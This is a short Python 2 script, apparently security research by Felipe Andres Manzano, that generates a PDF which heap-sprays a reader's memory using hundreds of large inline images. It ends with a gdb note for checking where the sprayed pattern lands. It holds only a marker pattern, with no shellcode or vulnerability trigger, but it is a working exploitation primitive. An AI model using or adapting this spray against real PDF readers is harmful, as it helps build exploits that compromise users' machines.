  1. ##########################################################################
  2. ####   Felipe Andres Manzano     *   felipe.andres.manzano@gmail.com  ####
  3. ####   http://twitter.com/feliam *   http://wordpress.com/feliam      ####
  4. ##########################################################################
  5. ## Heap spraying PDF using inline images
  6. from miniPDF import *
  7. import zlib,sys
  8.  
  9. #This constructs and adds the spraying page
def sprayPage(doc,pages, sc="A", size=1024*1024, N=300 , offset=0x44):
    """Build one page whose content stream is N inline images and add it to *doc*.

    Every inline image is declared as `size` x 1, /CS /G (gray), 8 bits per
    component, and its pixel data is the pattern *sc* repeated and then
    windowed from byte *offset*.  The content stream (the image operator
    repeated N times) is Flate-compressed and registered in *doc* before the
    page dict that references it; the page's /Parent is *pages*.  The page
    dict is returned so the caller can link it into the /Kids of *pages*.

    NOTE(review): the observable artifact is a single content stream made of
    N byte-identical `BI ... ID ... EI` operators with a very large /W; the
    repetition makes the FlateDecode'd stream tiny relative to its decoded size.
    """
    width, height = size, 1
    pixel_count = width * height

    # Repeat the pattern to at least `size` bytes, then take the window that
    # starts at `offset` (Python 2 integer division keeps the repeat count int).
    repeated = sc * (size / len(sc) + 1)
    payload = repeated[offset:pixel_count + offset]

    # One inline image operator; note there is no separator between the
    # pixel data and the EI keyword in this layout.
    image_op = '''q BI /W %d /H %d /CS /G /BPC 8 ID %sEI Q ''' % (width, height, payload)
    contents = PDFStream(image_op * N)
    contents.appendFilter(FlateDecode())
    doc.add(contents)

    # Page dict: empty resources, the stream above as contents, parent link.
    page = PDFDict()
    for key, value in (
        ("Type", PDFName("Page")),
        ("Resources", PDFDict()),
        ("Contents", PDFRef(contents)),
        ("Parent", PDFRef(pages)),
    ):
        page.add(key, value)
    doc.add(page)
    return page
  29.  
  30.  
  31. #The document
doc = PDFDoc()

# Page-tree root; its /Kids and /Count are filled in once the page exists.
pages = PDFDict()
pages.add("Type", PDFName("Pages"))

# Pattern handed to every inline image: each 0x1000-byte unit is
# "<<<<" + 0xff8 * "A" + ">>>>", so the bracket markers recur at a 0x1000
# stride.  Image width is 0x100000-100 bytes, repeated 400 times, and the
# payload window starts at byte 0x2c of the repeated pattern.
unit = "<<<<" + "A" * (0x1000 - 8) + ">>>>"
spage = sprayPage(doc, pages, unit, 0x100000 - 100, 400, 0x2c)

# Link the single page into the tree and register the tree itself.
pages.add("Kids", PDFArray([PDFRef(spage)]))
pages.add("Count", PDFNum(1))
doc.add(pages)

# Catalog is the document root object.
catalog = PDFDict()
catalog.add("Type", PDFName("Catalog"))
catalog.add("Pages", PDFRef(pages))
doc.add(catalog)
doc.setRoot(catalog)

# Python 2 print statement: emit the serialised document on stdout.
print doc
  56. ##gdb
  57. ##x/4x 0xb0000000 +0x1000*X
  58.  